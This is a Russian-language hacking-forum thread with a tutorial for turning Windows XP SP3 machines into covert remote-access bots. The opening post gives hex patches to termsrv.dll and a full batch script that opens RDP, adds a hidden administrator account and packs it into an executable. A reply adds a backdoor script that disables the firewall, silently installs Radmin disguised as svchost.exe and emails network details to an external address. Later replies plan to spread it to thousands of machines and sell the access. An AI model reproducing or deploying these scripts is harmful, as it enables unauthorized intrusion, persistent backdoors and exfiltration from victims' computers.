Форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум » Анонимность в сети интернет » Как сделать из ПК деда для Windows XP SP3:)


Как сделать из ПК деда для Windows XP SP3:)

Сообщений 1 страница 27 из 27

1

Привет кто читает этот мануал я xSouLx ша покурю и пойдем дальше ^^

Для начала на надо программы:
-WinHex
-Bat To Exe Converter

Сперва нам надо найти или скачать файл termsrv.dll версии 5.1.2600.5512.

Открываем программу WinHex и нажимаем на кнопку Open

http://uploads.ru/t/r/9/p/r9pW2.jpg

Указ уем путь к файлу termsrv.dll версии 5.1.2600.5512

http://uploads.ru/t/I/O/C/IOCrk.jpg

Нажимаем Открыть

http://uploads.ru/t/o/0/n/o0nxT.jpg

Теперь нам надо в файле termsrv.dll поменять HEX биты чтоб можно было заходить под двумя учетными записями. Просто по умолчанию можно зайти на одну учетную запись это защита Windows XP SP3.

22A17: 74 -> 75
22A69: 7F -> 90
22A6A: 16 -> 90

Из это:

http://uploads.ru/t/j/1/U/j1UDe.jpg

на это:

http://uploads.ru/t/I/e/k/IekSq.jpg

Нажимаем дальше File=>Save As... и сохраняем файл termsrv.dll.

Все файл termsrv.dll защиту с файла сняли что была по умолчанию:)

Теперь нам надо сделать BAT файл чтоб это все работало как надо :)

Открываем блокнот и пишем туда вот это:

Код:
netsh firewall add portopening tcp 3389 all
copy "termsrv.dll" "%SystemRoot%\termsrv.dll" /y
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 00000005 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\termsrv.dll /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f
sc config TermService start= auto
net start TermService
chcp 1251
net user UserHelp 1 /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup Администраторы UserHelp /add
net accounts /maxpwage:unlimited

netsh firewall add portopening tcp 3389 all - заносит в Windows брат маузер запись что порт этот добрый :)
copy "termsrv.dll" "%SystemRoot%\termsrv.dll" /y - копирует файл termsrv.dll в папку Windows
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f - ставит галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 00000005 /f - разрешить Max количество подключений одновременно
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\termsrv.dll /f - это строка отвечает за путь файла termsrv.dll
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f - прячем нашу запись UserHelp
sc config TermService start= auto - это тип запуска Службы терминалов тут стоит AUTO
net start TermService - Запуск Службы терминалов если она отключена
chcp 1251 - Кодировка
net user UserHelp 1 /add - создание учоной записи логин UserHelp пароль 1
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help" - Описание учетной записи UserHelp
net localgroup Администраторы UserHelp /add - добавляем привилегии администратора ученой записи UserHelp
net accounts /maxpwage:unlimited - Не ограниченное время для удаления ученой записи UserHelp

Все теперь нажимаем в Блокноте Файл=>Сохранить как...

Ставим тип файла место Текстовые документы (*.txt)

http://uploads.ru/t/4/Y/z/4YzRH.jpg

На

http://uploads.ru/t/6/5/F/65Fhp.jpg

и в имени файла ставим название файла с расширениями BAT привет (1.bat) и нажимаем Сохранить.

Все осталось тока с компилировать bat в exe и все.

Запускаем программу Bat To Exe Converter

http://uploads.ru/t/4/k/p/4kpCX.jpg

Ставим галочки как на скриншоте

http://uploads.ru/t/B/v/O/BvOe1.jpg

Нажимаем кнопку Batch file:

http://uploads.ru/t/z/V/0/zV0GM.jpg

Указ уем путь к Bat файлу и переходи в кладку Include

http://uploads.ru/t/j/R/b/jRbix.jpg

Нажимаем кнопку Add и добавляем туда файл termsrv.dll и все нажимаем кнопку Compile

Все теперь осталось тока запустить программу и перезагрузить ПК и дед готов :)

Не забывайте про Коментарии Всем Удачи :)

+6

2

Братка красавчик вот шар

0

3

Респект!  :flag:

0

4

+ + + 100% КРАСАВА !!!

0

5

Когда подключаюсь к тому кто запустил это у него вырубается интернет в чем проблема сделал все правильно!

0

6

я не знаю наверно это у тебя с Windows что та или программа мешает какает а :)

0

7

а может из за sp наверно у него 2 или 3 тут же на 3 а на 2ую как? также?

0

8

выложите кто нибудь у кого получилось пропатченный файл

0

9

я потом выложу готовое файлы

0

10

хорошо будем ждать

0

11

всьо то   харашо но   через батнік система не дає замінити системний файл  файл termsrv.dll....

0

12

это за фаервол отрубать надо его и все и должно копировать

0

13

Если будит время то покажу как нa delphi 7 написать спамер почты

0

14

:cool: Красава

0

15

Сегодня будит ссылка на сайте на этот троян в раздели трояны

0

16

на Windows XP SP 2 делать также надо тока HEX байты другие заменить надо

это для Windows XP SP 2 походу

termsrv.dll (Windows SP2 5.1.2600.2180) 295,424 bytes
Offsets: hexadec.

128BB: 75 -> 74
217D3: 8B -> 33
217D4: C7 -> C0
2192D: 8B -> 33
2192E: C7 -> C0
225B7: 54 -> 20

для Windows XP SP 3

termsrv.dll (Windows SP3 5.1.2600.5512) 295,936  bytes
Offsets: hexadec.

22A17: 74 -> 75
22A69: 7F -> 90
22A6A: 16 -> 90

0

17

можно просто открыт порт 3389  автор не я давненько лежит   может кому нибудь понадобиться     

Код:
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile /v EnableFirewall /t reg_dword /d 0 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 3389:TCP /t reg_sz /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 139:TCP /t REG_SZ /d 139:TCP"="139:TCP:*:Enabled:@xpsp2res.dll,-22004 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 445:TCP /t REG_SZ /d 445:TCP:*:Enabled:@xpsp2res.dll,-22005 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 137:UDP /t REG_SZ /d 137:UDP"="137:UDP:*:Enabled:@xpsp2res.dll,-22001 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 138:UDP /t REG_SZ /d 138:UDP:*:Enabled:@xpsp2res.dll,-22002 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 23:TCP /t REG_SZ /d 23:TCP"="23:TCP:*:Enabled:crimson /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 3389:TCP /t reg_sz /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 139:TCP /t REG_SZ /d 139:TCP"="139:TCP:*:Enabled:@xpsp2res.dll,-22004 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 445:TCP /t REG_SZ /d 445:TCP:*:Enabled:@xpsp2res.dll,-22005 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 137:UDP /t REG_SZ /d 137:UDP"="137:UDP:*:Enabled:@xpsp2res.dll,-22001 /f
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 138:UDP /t REG_SZ /d 138:UDP:*:Enabled:@xpsp2res.dll,-22002 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Pa rameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 23:TCP /t REG_SZ /d 23:TCP"="23:TCP:*:Enabled:crimson /f > nul
netsh firewall add portopening protocol = TCP port = 3849 name = TCP > nul
netsh firewall add portopening protocol = TCP port = 4899 name = TCP > nul
netsh firewall add portopening protocol = TCP port = 445 name = TCP > nul
net user voland ms-13 /add > nul
net localgroup "Администраторы" voland /add > nul
net localgroup "Пользователи удаленного рабочего стола" voland /add > nul
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v "voland" /t REG_DWORD /d 0 /f > nul
reg add HKLM\SYSTEM\ControlSet001\Services\TlntSvr /v Start /t REG_DWORD /d 2 /F > nul
reg add HKLM\SYSTEM\ControlSet001\Services\RemoteRegistry /v Start /t REG_DWORD /d 2 /F > nul
reg add HKLM\SYSTEM\ControlSet001\Services\RemoteAccess /v Start /t REG_DWORD /d 2 /F > nul
reg add HKLM\SYSTEM\ControlSet001\Services\RpcLocator /v Start /t REG_DWORD /d 2 /F > nul
reg add HKLM\SYSTEM\ControlSet001\Services\RpcSs /v Start /t REG_DWORD /d 2 /F > nul
net start Telnet > nul
net start RemoteRegistry > nul
net start RemoteAccess > nul
net start RpcLocator > nul
net start RpcSs > nul
"%SYSTEMROOT/svchost.exe" /install /silence > nul
"%SYSTEMROOT/svchost.exe" /save /silence /pass:ms-13 /port:4899 > nul
"%SYSTEMROOT%/svchost.exe" /start > nul
echo Windows Registry Editor Version 5.00 >%systemroot%\crimson.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] >%systemroot%\crimson.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] >%systemroot%\crimson.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] >%systemroot%\crimson.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t] >%systemroot%\crimson.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters] >%systemroot%\crimson.reg
echo "NTAuthEnabled"=hex:00,00,00,00 >%systemroot%\crimson.reg
echo "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,9 2,11,f4,ce,1a >%systemroot%\crimson.reg
echo "DisableTrayIcon"=hex:00,00,00,01 >%systemroot%\crimson.reg
echo "Port"=hex:23,13,00,00 >%systemroot%\crimson.reg
echo "EnableLogFile"=hex:00,00,00,00 >%systemroot%\crimson.reg
echo "FilterIp"=hex:00,00,00,00 >%systemroot%\crimson.reg
echo "AskUser"=hex:00,00,00,00 >%systemroot%\crimson.reg
regedit %systemroot%\crimson.reg /s
erase %systemroot%\crimson.reg
cd %SYSTEMROOT%/
blat.exe -install -server smtp.mail.ru -port 25 -f stigmat@mail.ru -u stigmat -pw 777 > nul
ipconfig /all > %systemroot%/ms.txt > nul
blat.exe %systemroot%/system32/ms.txt -to amatory@mail.ru > nul
erase %systemroot%/ms.txt > nul
echo erase %systemroot%/system32/ms.txt >%systemroot%\lsass.bat > nul
echo ipconfig /all > %systemroot%/ms.txt >%systemroot%\lsass.bat > nul
echo blat.exe %systemroot%/system32/ms.txt -to amatory@mail.ru >%systemroot%\lsass.bat > nul
schtasks /create /tn "security" /sc minute /mo 600 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\lsass.bat > nul
"%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" http://httpz.ru/nfdufpj7zbb.gif

сохраняем *.bat

0

18

Я знаю что на бате порт можно открыть а вход под 2 учетной записью ты набате не сделаешь для этого надо dll файл

0

19

xSouLx
ТЫ БОГ Bat'а !))))
А на семерке как сделать?

Отредактировано aaalan (2012-02-05 18:51:35)

0

20

на 7 трудней там учетную запись не реально сделать ну если по везет то можно и на 7 сделать принцип тот самый тока надо dll файл и все

0

21

а готовый файл можно выложить?

0

22

Petr написал(а):

а готовый файл можно выложить?

А сюда чо не заглядывал на второй наш ресурс http://xaker26.com/page103 RDP .

К стати забыл ссылку на эту статью там прикрепить щас исправлю...

0

23

:cool:

0

24

Однозначно +++ автору статьи! Четко расписал.
Интересно если купить евромикс загрузки со статой и прогрузить этим по среднячку 1-2К ботов, какой будет отстук?)
Как мне кажеться, XP SP3-им пользуются добрых 40%. Cамо-сабой криптануть до фада 30$ (грубо) + загрузки 20-30$ (уники по 100$) и примотать Bat, что бы отчеты слал типо как в панель, а в нашем случае на почту (VPS покупать абузоустойчивый не надо)).
Получиться так своими дедами разжиться как думаете при затратах в такие копейки 50-60$? Или уже не актуально?

0

25

BeZNaL написал(а):

Однозначно +++ автору статьи! Четко расписал.
Интересно если купить евромикс загрузки со статой и прогрузить этим по среднячку 1-2К ботов, какой будет отстук?)
Как мне кажеться, XP SP3-им пользуются добрых 40%. Cамо-сабой криптануть до фада 30$ (грубо) + загрузки 20-30$ (уники по 100$) и примотать Bat, что бы отчеты слал типо как в панель, а в нашем случае на почту (VPS покупать абузоустойчивый не надо)).
Получиться так своими дедами разжиться как думаете при затратах в такие копейки 50-60$? Или уже не актуально?

тихо-тихо разогнался ))

там когда то говорил xSouLx что работает это только на сборках "зверь"

я давненько побывал, но че то так и не пошло.
да и не забывай что айпи статический нужен

Отредактировано † Voland † (2013-05-16 22:04:51)

0

26

† Voland †
Исходя из того что дед стоит от 2-3$ + выборка по стране от 1-3$ + выбор штат, регион 0.5-1$ и чек блек IP и прочего 0.5$)) Получается все равно интересная темка,  правда в большом количестве они все-равно умрут на руках постепенно. Так что риск должен оправдать затраты, если бы продавал дедов то попробовал бы зделать))
П.С.† Voland † у тебя можно пройти проверку?

0

27

а забыл сказать если знаешь ип и стоит модем проста можно зайти на модем и открыть порт на модеме :)

+1


Вы здесь » Форум » Анонимность в сети интернет » Как сделать из ПК деда для Windows XP SP3:)